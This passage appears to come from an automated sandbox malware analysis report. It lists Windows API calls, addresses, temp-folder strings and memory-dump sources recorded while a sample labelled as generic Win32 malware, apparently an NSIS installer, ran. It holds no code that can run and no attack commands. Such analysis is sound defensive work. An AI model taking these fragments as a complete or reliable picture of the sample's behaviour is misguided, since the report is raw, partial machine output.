                                                                                                                        • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nst8185.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp, 44v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76343420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"), ref: 00405EA9
                                                                                                                        • CharNextW.USER32(00000000), ref: 00405EAE
                                                                                                                        • CharNextW.USER32(00000000), ref: 00405EC6
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\nst8185.tmp, xrefs: 00405E9C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nst8185.tmp
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405DF6
                                                                                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405E00
                                                                                                                        • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E12
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                        APIs
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 70591171
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 705911E3
                                                                                                                        • GlobalFree.KERNEL32 ref: 7059124A
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 7059129B
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 705912B1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72590322272.0000000070591000.00000020.00000001.01000000.00000004.sdmp, Offset: 70590000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70590000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Free$Alloc
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll), ref: 0040269A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrlen
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nst8185.tmp$C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(00000000,00000000,004031FC,?), ref: 00403031
                                                                                                                        • GetTickCount.KERNEL32 ref: 0040304F
                                                                                                                        • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • IsWindowVisible.USER32(?), ref: 00405549
                                                                                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 0040559A
                                                                                                                          • Part of subcall function 004044EC: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,76343420,00000000,C:\Users\user\AppData\Local\Temp\,00403B36,00403A4C,?,?,00000008,0000000A,0000000C), ref: 00403B78
                                                                                                                        • GlobalFree.KERNEL32(004EFEC0), ref: 00403B7F
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B5E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$GlobalLibrary
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 1100898210-3355392842
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,80000000,00000003), ref: 00405E42
                                                                                                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,80000000,00000003), ref: 00405E52
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CharPrevlstrlen
                                                                                                                        • String ID: C:\Users\user\Desktop
                                                                                                                        • API String ID: 2709904686-3370423016
                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F9E
                                                                                                                        • CharNextA.USER32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FAF
                                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 190613189-0